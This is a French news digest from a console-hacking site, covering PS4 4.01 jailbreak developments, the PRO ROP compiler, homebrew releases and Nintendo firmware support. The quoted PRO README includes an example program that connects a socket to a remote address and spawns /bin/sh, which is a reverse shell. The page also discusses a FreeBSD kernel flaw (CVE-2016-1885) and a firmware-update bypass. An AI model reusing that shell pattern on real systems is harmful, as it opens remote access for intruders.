Logic-Sunrise : actualités, téléchargements, releases, dossiers et tutoriaux

Chose promise, chose due, le code qui permet l'exploit sous firmware 4.01 a été dévoilé, il s'agit d'un outil privé sous forme de code qui permet le jailbreak de la PlayStation 4.    

 

 

  PRO: PROgramming ROP like a PRO   This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.   Build   pip install git+https://github.com/chaitin/pro If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.   cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4 Examples   toy {     {% include "gadgets.pro" %}     {% include "glibc.pro" %}     const AF_INET(2);     const SOCK_STREAM(1);     const IPPROTO_IP(0);     var fd;     socket(AF_INET, SOCK_STREAM, IPPROTO_IP);     func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;     store_rdx_rax(&fd, undefined);     printf("socket fd = %d\n", fd);     array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];     connect(fd, addr, 0x10);     {% for i in range(3): %}         dup2(fd, {{i}});     {% endfor %}     system("/bin/sh");     exit(1); } Usage   A BIG TODO. Just try and learn by yourself.   Quick Guide   All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.   Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.   Array can be declared with size(Int) or directly initialized with its content(String).   For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.

 

 

  Bien entendu, ce code et les exemples sont réservés aux développeurs.   Tout est là : chaitin/pro   Téléchargement : ROP Tool   

La Team Gateway nous confirme sur son site internet officiel que son linker est totalement fonctionnel sur le tout dernier firmware de Nintendo 11.2. La team confirme, même si nous le savions déjà, que le firmware est totalement innofensif pour les fonctions du linker.  

Les fonctions, l'EmuNAND et le menu de sélection multiroms sont totalement fonctionnels sous ce nouveau firmware 11.2.

 

 

 

 

    26/10 – Latest Emunand support   Posted on October 26, 2016   Just a quick confirmation that Gateway Emunand support Nintendo’s latest firmware 11.2 You can safely update your Emunand.   More to come soon!

 

 

 

  Alors que ExZap nous informe que la version Patreon v1.6.2 sera disponible le 29 Octobre 2016, nous y reviendrons en détails à ce moment là, nous apprenons l'arrivée d'un nouvel utilitaire nommé Cemu Utilities qui est disponible dans une toute première version v0.01.   Uniquement développé pour Cemu Windows 64, Cemu Utilities va vous permettre de modifier légèrement les jeux, et optimiser encore un peu plus Cemu. Pour le moment, Cemu Utilities ne fonctionne qu'avec Super Mario 3D World.   Bien entendu pour le moment les fonctions sont très limitées, quelques tweaks et quelques codes pour le jeu, mais il y a de grandes chances qu'il progresse rapidement.           
This is a release of CEMU Utilities 0.01, for the WiiU Emulator CEMU for Win64.    Requirements  ------------    - Windows 7 (x64) or above  - OpenGL 4.0 (4.5 is used if available)  - RAM: 4 GB minimum, 6 GB or more recommended  - NVIDIA GPU or AMD GPU    CEMU Utilities 0.01 Filelist  --------------------------------  DInput0.dll 4,590,080 -> Main program  MakeUtilities.exe 43,008 -> Make "Cemu Utilities.exe"    Check the files you get, if they are not the same as above, please go to http://www.ff18.com to  download one, or some functions may not work correctly.    Usage  -----    Run "MakeUtilities.exe" to Create CEMU Utilities for offical version. A filenamed "Cemu Utilities.exe"  should be appeared.    You should see a "# Utilities #" menu when you run "Cemu Utilities.exe". There are 5 submenus in it.    1 Golden Finger -> Status 60%. -> 金手指  Golden Finger is finger make by pure gold, usually as the second finger in the right hanf.    2 Game Buster -> Status 10%. -> 遊戲克星    GameBuster is a game cheater(like CheatEngine).    3 Speed Pig -> Status 10%. -> 變速小豬    Speed Pig is a tool to increase or decrease the delay between refresh, so it should make the EMU  run faster or slower, but it is still according to your CPU. If it can't make your games faster  because your CPU is too slow, the delay between frame to frame is very little, so you won't notice  a very large increase.    4 Snap IT -> Status 10% -> 截距滷味  This is a tool to snap a picture of EMU, the short key is ALT+S. All the snaps should be put in  SNAPS folder. It snaps not only the game screen, but the entire Chankast window.    5 About CEMU Utilities  This file which you are seeing.      Contacts  --------  Kryso - The main programmer of CEMU Utilities      

 

 

    Téléchargement  : Cemu Utilities Ver 0.01   

 

La Team Libretro informe sur son compte twitter qu'elle est en train de travailler sur une version de RetroArch pour Wii U. Le développeur Aliaspider a travaillé avec l'équipe Libretro sur le portage de l'émulateur New 3DS et Playstation Portable sur la Wii U.         Même si pour l'heure aucune version n'est disponible, même en bêta, il reste intéressant de savoir que ce portage est encours d'étude.        Information : Portage préliminaire retroArch Wii U   

Le développeur Red-EyeX32 nous confirme que son bypass fonctionne, si vous êtes sous firmware 4.01 ne mettez pas à jour, vous pouvez bypasser pour profiter du 4.05 sans mettre à jour votre console.    Il semblerait que Sony n'est pas changé le chemin d'accès sur ses serveurs, seulement le passphrase, et en conséquence, son PSProxy fonctionne parfaitement.            Téléchargement : PSProxy 4.00  

Nous apprenons une fois de plus sur le forum de Wololo, quelques infos intéressantes à propos du hack 4.01 de la team chinoise lors du concours GeekPwn.

 

Après que les membres de la team est annoncés qu' ils révèleraient les failles de leur exploit à Sony, d' autres devs se sont empresser de chercher comment ce dernier à été mis en place.

 

 

 

 

Avec les premières recherches, certaines personnes auraient eu accès à quelques infos sur l'exploit FreeBSD de la team Taichin Tech.L'exploit kernel de ce hack 4.01, reposerait apparemment sur une faille CVE (CVE-2016-1885) qui a été révélé en Avril. Il semblerait qu' elle n' ai pas été correctement patché et qu' elle serait une des failles que les hackers Taichin Tech auraient utilisés pour accéder au système interne de la PS4.

 

The argument validation in r296956 was not enough to close all possible overflows in sysarch(2)

 

 

 

 

Bien sur, tout ceci n' est pour l'instant pas encore prouvé, mais les choses avancent dans le bon sens, de plus FreeBSD étant open-source, les détails de la correction de cette faille kernel pourront aidés nos hackers à mieux comprendre comment cette dernière fonctionne.

Naturellement toutes ces infos, sont pour nous simple users, incompréhensibles, mais ne doutons pas que les personnes qualifiées seront quoi en faire et s' en servis comme il le faut.

Ce qui a déjà commencé d' après certains hackers.

 

Que reste-t-il en théorie pour un jailbreak des PS4 >1.76?

 

En 1.76, les choses sont déjà faites, nous possédons un exploit webkit et un exploit kernel, pour le reste des PS4 donc >1.76, en théorie, je le répète, nous possédons un exploit webkit en 3.55 (la même faille d' henkaku) par contre il nous manquait juste un exploit kernel afin d' être au même niveau que les PS4 en 1.76, d' où l' importance de cette faille CVE (CVE-2016-1885).

 

Donc en conclusion, les PS4 en 3.55 et moins ont de grandes chances de rejoindre les PS4 en 1.76 au niveau possibilité de Hack (Linux, Menu Debug, etc...).

Pourquoi 3.55 et moins et non 4.01 et moins, tout simplement car nous ne possédons pas la faille webkit utilisé par les chinois et cette dernière sera (a été?) révélé à Sony, elle sera donc bloqué si ce n'est pas déjà le cas avec le 4.05.

 

SpecterDev confirme sur la shootbox de pshax ce qui vient d'être écrit sur cette news:

 

 

Nous vous conseillons, si le hack PS4 vous intéresse, de ne pas mettre à jour vos consoles au dessus de 3.55 afin de profiter de la faille webkit et ainsi du futur exploit kernel.

Pour ceux en 4.00/4.01il vous faudra être patient et ne pas mettre à jour en 4.05 afin de ne pas perdre la faille webkit toujours présente dans ces 2 firmwares mais non connue encore de la scène (en théorie).

 

Liens concernant cette fameuse faille kernel:

 

- FreeBSD security Advisorie

- CVE-2016-1885

- L'exploit kernel avec les corrections apportés

 

 

 

Alors que le hack PS4 semble prendre une nouvelle tournure, la scène PS Vita continue sur sa lancé en proposant toujours plus d' homebrews et d'utilitaire à destination de la dernière portable de Sony.

 

Nous apprenions il y a peu une petite découverte plutôt intéressante, en effet, nous savons maintenant que les Ps Vita 1000 et 2000 possèdent une mémoire de stockage interne (ur0:) respectivement de 2GB pour le modèle 1000 et 1,5GB pour le 2000.

 

Pourquoi parler de cela me diriez vous, tous simplement pour la raison suivante, Lupo511, membre des forums de Wololo, vient de publier un nouvel homebrew permettant d' accéder et de stocker des applications dans cette mémoire (ur0:) avec : Application Storage Manager v0.01.

 

 

 

Cela permettra donc à tous de récupérer quelques gigas de stockage, au vu du prix et de la rareté des cartes SD aujourd’hui ceci n' est pas négligeable.

Attention toute fois, accéder à cette partie de votre console comporte des risques, Lupo511 lui même nous met en garde sur son utilisation:

 

Citation de l' auteur:

 

Gardez à l'esprit que cela n'a pas été testé à 100% et certaines applications peuvent ne pas fonctionner lorsqu' elles sont déplacés vers la mémoire interne. Je ne l'ai testé qu' avec des homebrews et non avec des jeux. Je ne prends aucune responsabilité pour tout dommage que cela pourrait faire à votre console.

 

 

Tuto:
 

Use DPAD UP and DPAD DOWN to change the selected option Use X to select/confirm Use O to go back/cancel
The confirm button will be binded to X even if your console uses the O-to-confirm bindings because I had some problems while trying to check the actual system confirm button. I’ll make it work as intended once I fix it.

It’s an unsafe homebrew because it needs access to the whole filesystem (ux0:app/, ur0:app/, ur0:shell/db/). The source is also linked below, so you may build from source if you want.

 

 

 

 

Télécharger Application Storage Manager v0.01

Les pirates chinois de la Chaitlin Tech nous livrent quelques informations complémentaires, il faut avouer que leur réputation n'est désormais plus à faire mais il convient d'apporter quelques précisions.   Selon les règles imposées par le concours GeekPwn, les failles utilisées ou dévoilées seront reportées à Sony, certains développeurs montent au créneau, c'est le cas d'Evilsperm par exemple qui déclare " Félicitations de griller complètement un exploit, que d'autres ont trouvé il y a quelques mois, vous avez dû vous faire un paquet de fric ".   Clairement nous ne savons pas si le firmware 4.05 libéré aujourd'hui a pour ambition de colmater cette brèche du 4.01, mais les pirates nous affirment qu'ils utilisaient la même méthode que celle de FailOverfl0w pour exécuter leur démo. Ils ne donnent par contre aucun détail sur une éventuelle libération de ce jailbreak.         Par contre ils diffusent bien la vidéo complète qui nous paraissait coupée hier (l'histoire des sources de lumière différente), ainsi que les traductions en anglais des sous-titres chinois, qui du coup donne du sens à la vidéo !     

 

 

L'un des meilleurs vérificateurs VPKViewer nous revient dans une nouvelle version v0.4b qui apporte son lot de nouveautés.    Le développeur leecherman nous propose donc une nouvelle version de VPKViewer qui va vérifier les VPK, le développeur a mis à jour pas mal de chose, il en a profité pour ajouté de nouvelles options et une nouvelle barre pour extraire les contenus des VPKS.           v0.4b: *Added new toolbar option to choose compression level when creating VPK files. *Added new toolbar option to generate full VPK or just the installer from folder. *Added new toolbar option to enable\disable auto save hashes to SFV file when hashing files. *Added new toolbar button to extract VPK contents from VPK file in proper structure.  

 

 

  Téléchargement : VPKViewer v0.4b   Merci mars-chronik   

A la suite de la démonstration du Ksploit sur firmware 4.01, il est surprenant de voir que Sony s'est empressé de sortir un tout nouveau firmware portant la numérotation à 4.05.    Ce firmware a seulement pour ambition d'améliorer la qualité de performance et la stabilité du  système, on connait désormais la chanson.                  Il a été mis en ligne cette nuit et à priori porte la date de conception du 25.10.2016, nous ne savons pas réellement s'il a été fait en catastrophe hier, ou bien s'il était prévu depuis des semaines, qu'il a suivi le contrôle qualité classique ou s'il est passé par des chemins plus courts.                  Quoiqu'il en soit, le mieux est de se préserver de l'installer si vous le pouvez, en attendant d'en savoir un peu plus sur la procédure employée par la Team sous firmware 4.01, mais ce qui est sûr c'est que désormais ça va se compliquer, puisqu'il va falloir utiliser un proxy vu qu'on ne pourra plus aller en ligne avec le 4.01.    Pour éviter de vous faire installer le 4.05, nous ne vous fournissons pas les liens. 

Après s'être démené pour proposer un reverse engineering partiel de la caméra de la PlayStation 4, le développeur Big Boss travaille actuellement sur celui de PlayStation VR.   PlayStation VR  connu auparavant sous le nom de code Morpheus est le périphérique Sony de réalité virtuelle.              PlayStation VR se compose de plusieurs éléments :   - Casque VR  - Une unité de calcul qui assure l'interface - PlayStation 4 - PlayStation 4 Camera - PlayStation Move / PlayStation dualshock - TV avec HDMI    Comme vous le savez le reverse engineering consiste a comprendre comment fonctionne les appareils autant niveau hardware que software, et le développeur Big Boss n'a encore une fois pas fait les choses à moitié.                        La faculté de connecter l'ensemble par USB laisse entrevoir des dumps et des contournements sur PC, notamment grâce aux protocoles USB  :     Software: USB Protocol Suite 7.35 Hardware: USBTrace 2500H     Pour la suite nous vous laissons découvrir l'ensemble du travail de Big Boss ici : Reverse Engineering PS VR  

Un développeur s'est dors et déjà penché sur le problème de boot du NTR et propose déjà un bootNTR afin que le CFW puisse se lancer sur le dernier firmware officiel lancé par Nintendo cette nuit.    C'est astronautlevel2 qui nous offre BootNTR avec le support du firmware 11.2.    
11.2 NFIRM Support @astronautlevel2 astronautlevel2 released this 2 hours ago   Support for 11.2 firmware.   Thanks to Apache Thunder for pointing out that the arm11 kernel section is exactly the same.  

 

 

  Téléchargement : BootNTR avec support 11.2